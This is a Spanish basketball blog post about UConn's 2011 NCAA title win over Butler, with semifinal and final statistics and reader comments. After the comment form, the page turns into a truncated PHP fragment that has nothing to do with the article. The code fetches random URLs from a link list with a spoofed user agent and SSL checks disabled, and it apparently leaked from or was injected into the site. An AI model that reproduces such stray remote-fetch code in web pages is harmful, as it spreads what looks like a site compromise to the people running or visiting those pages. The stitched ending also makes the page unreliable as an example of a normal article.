UConn se alza con su tercer título nacional

05 de April de 2011 por txusma

La racha de victorias consecutivas de los Huskies tan solo pudo finalizar tras la última bocina. Después de acabar la liga regular con un mediocre balance de 9 partidos ganados y 9 perdidos, Kemba Walker y los suyos han encadenado 11 victorias que les han dado los títulos de la Big East Conference y de la NCAA. Anoche se llevaron su tercer título nacional ante Butler en una final que pasará a la historia como una de las peores, en parte al negativo acierto de los chicos de Brad Stevens.

La historia de la final empieza 2 días antes. UConn se impuso a Kentucky sufriendo en otro partido más bien feo marcado por el poco acierto de ambos equipos. De hecho, el resultado (55-56) era hasta la fecha, el tercero más bajo de la historia de la Final Four. En lo que parecía un concurso de errores, UConn tan solo anotó 1 triple de 12 intentos mientras que Kentucky fue incapaz de anotar una canasta durante 5 minutos y medio de los últimos compases del partido. Kemba Walker fue el mejor del partido una vez más con 18 puntos, 6 rebotes, 7 asistencias y 2 robos, con Jeremy Lamb ejerciendo de escudero fiel (12-9-4). Enfrente Terrence Jones (11 puntos  y 15 rebotes) y un desacertado hasta los segundos finales,  Brandon Knight (17 puntos, 6 de 23, 8 rebotes y 5 asistencias) fueron los más destacados.

Al lado de esta semifinal, la otra fue una orgía de puntos. Shelvin Mack lideró a Butler a la victoria por 70-62 frente unos Rams que sufrieron de lo lindo ante la dura defensa de los Bulldogs. VCU se vio superado en todo momento por fuera, con un Mack inconmensurable (24 puntos y 6 rebotes) y por dentro, cogiendo hasta 16 rebotes menos que sus rivales. Jamie Skeen fue el más destacado de su equipo con 27 puntos, 6 rebotes y 3 asistencia mientras que por Butler, Shelvin Mack, aparte, apareció el omnipresente Matt Howard con 17 puntos, 8 rebotes, 2 asistencias, 2 robos y 1 tapón.

Con semejante ingredientes estaba claro que la final no iba a ser un compendio de juego ofensivo, espectáculo y diversión pero nadie se esperaba semejante descalabro. Se batieron muchas y muy variadas marcas negativas: Los 94 puntos que anotaron entre ambos equipos (41-53) es la marca más baja en una final desde 1950; UConn anotó 1 de sus 11 triples intentados, el peor porcentaje de acierto en una final junto a Duke en 1990; Butler se quedó en 41 puntos, la menor anotación de un equipo en una final desde 1949, y se quedó, atención, en un acierto del 18.8% en tiros de campo, la peor marca de siempre; los Bulldogs tiraron hasta 33 veces desde más allá de la línea de 3, anotando 9 intentos, pero lo increíble es que sólo fueron capaces de anotar 3 canastas de 2 puntos en todo el partido… Un auténtico desastre de partido y un horror para cualquier espectador que no tuviera una relación emocional con alguno de los 2 equipos.

Curiosamente el partido llegó igualado a la media parte con ambos equipos atenazados por los nevios y defendiéndose prácticamente sólos. Fue en la segunda parte, en que los jugadores de Butler cayeron en una espiral de desacierto de la que nunca se recuperarían. Los números indivuales tampoco fueron para tirar cohetes: Kemba Walker, 19 puntos (5 de 19) y 9 rebotes, Jeremy Lamb (12 puntos, 7 rebotes y una gran defensa sobre Shelvin Mack) y Alex Oriakhi (11 puntos y 11 rebotes), fueron los más destacados. Por los Bulldogs no podemos salvar prácticamente a nadie.

Fin de fiesta con gatillazo. Imposible haber quedado contentos del todo después de la triste Final Four y la tristísima final que contemplamos. Al menos nos quedamos con detalles de auténtico crack de Kemba Walker o con el talento de jugadores como Shelvin Mack, Jeremy Lamb o Brandon Knight.

Apaguen los focos. Nos vemos el año que viene.

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Como dice Adande es ESPN… “Dear NBA: please start scheduling games the first Monday in April so we have the option of watching real basketball”

    Crack 😀

      Citar

  2. Busky23 dice:
    #2

    Vaya telita de final four…tengo la final grabada para verla este mediodía pero creo que después de leer la crónica con ver el resumen tengo bastante.
    Lo siento por Butler que después de repetir otro grandísimo torneo se han vuelto a quedar en la orilla.

      Citar

  3. Len Bias dice:
    #3

    Primera final de la NCAA que veo y, ahora mismo, creo que será la última. Por dios, que horas de sueño más malempleadas. Lo de Butler de traca, no les entraba un triple y seguían tirando, y Brad Stevens no sé a que esperó para decirles que empezasen a penetrar o tirar de 3-4 metros.

    Muy raro todo, no creo que fuesen tan malos como demostraron ayer.

      Citar

  4. kantonyo dice:
    #4

    Bueno bueno, ya veo que me voy un ratito y poneis a caldo la NCAA… jajaja.

    Hay que tener en cuenta que una final a partido único y jugandose tanto, sobre todo teniendo en cuenta que para muchos será su única oportunidad en la vida, pueden pasar estas cosas. Como pasa en Europa en la Euroliga, pocas grandes finales se han visto. Como mucho emoción, pero poco baloncesto. Además no tenemos que olvidarlo que la NCAA no es una liga paralela a la NBA, es una liga de desarrollo, como si hablaramos de un SUB-21.

    Creo que el espectaculo en sí, no es la final four ni la final, eso todo el March Madness, todo lo que ha pasado durante este último mes.

    Yo creo que hemos visto a unos 15 jugadores mínimo con grandes cualidades, pienso que esta hornada es mejor que la del año pasado, no cuento a Griffin. Opino que el draft es bueno viendo como iba la cosa hace un mes. Y sobre todo pq de Europa pueden llegar tambien buenos jugadores, aunque es verdad que algunos como Barnes, Sullinger, Lamb, Marshall o Zeller puede que se queden un año más en la NCAA.

    Tambien en el NIT se ha visto a un gran Alec Burks q ya aspira a top 10 y siguen apostando en los mockdrafts por Perry Jones, para mi esta muy verde, y ha decepcionado bastante este año.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Y después del jolgorio este,,,los PErry Jones y compañia, ¿se van a enclaustar en casa hasta los examenes de Junio?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>